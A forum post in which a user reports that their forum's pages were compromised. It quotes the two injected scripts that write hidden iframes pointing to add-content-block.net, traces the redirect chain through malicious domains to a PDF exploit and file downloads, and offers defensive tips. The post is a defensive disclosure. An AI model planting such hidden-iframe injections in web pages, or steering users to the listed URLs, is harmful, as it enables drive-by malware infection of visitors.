Seems to be... Currently, there seems to be code on each of the pages. (To see it, view the page source that you're on (seemingly regardless of the style you're using), and look for the words plgbn15(p) and flbn15(p)). The first block of code, executed and evaluated, does this:
Code:
window.status='Done';document.write('<iframe name=b21a src="http://add-content-block.net/t/?'+Math.round(Math.random()*14850)+'b21a'+'" width=135 height=110 style="display:none"></iframe>')
while the second does this:
Code:
window.status='Done';document.write('<iframe name=7346 src="http://add-content-block.net/t/?'+Math.round(Math.random()*31108)+'7346'+'" width=404 height=77 style="display:none"></iframe>')
Both of these attacks are known as malicious iframe attacks (read more
here,
here and
here. For more info on iframes, check
wikipedia. In each case, the iframes trigger a series of redirections, and I managed to partially trace them through a bunch of websites. (Partial because my modem decided to crash midway.)
The websites are listed in the order that they were requested by the malicous iframe:
add-content-block.net/t/?13559b21a (The last part is always somewhat random and will vary.)
analystic.org/in.cgi?16&e1d9f8 (Ditto, as far as I can tell.)
analystic.org/potok.php
analystic.org/in.cgi?8
xdrv.info/uno/count.php?o=2
busyhere.ru/in.cgi?pipka2
xdrv.info/uno/count.php?o=7
xdrv.info/uno/exploits/x18.php?o=2&t=1223824153&i=3707701169 -- this opened a pdf
66.212.19.146/g/index.php -- autorun a file
66.212.19.146/g/pdf.php -- downloads a file
pornarrows.com/none
In each case, the loading is fairly undetectable - the most you'll see is "Loading analystic.org/potok.php...", and briefly at that. As far as I can tell, this takes advantage of a vulnerability in Adobe Acrobat to do something. I'm not sure what, running it in a sandbox caused Acrobat to crash badly.
At this point, I can't do anything, beyond trying to trace the entire route it takes, which I can't right now for various reasons. However, I believe that using Firefox with NoScript (
not just Firefox alone) should prevent this attack from succeeding. One thing that you can check is C:\Documents and Settings\All Users\Start Menu\Programs\Startup and see if there's a file called browsers.exe? If there is, delete it. That's the only reference I came across that had a reference to a specific file.
I'll continue this tomorrow (in about 7 hours or so if you're counting), but in the meantime KitWiz and Robbiethe1st, among others, will probably have some insights into this whole thing. Also, sorry to Yash for starting on this topic in the Ranting Board and derailing one of the topics.
I am sincerely hoping that someone will find a way to prove me wrong, but to me it looks as if the 2kinds forum has been a victim of a malicious attack, whether automated or targeted at 2kinds.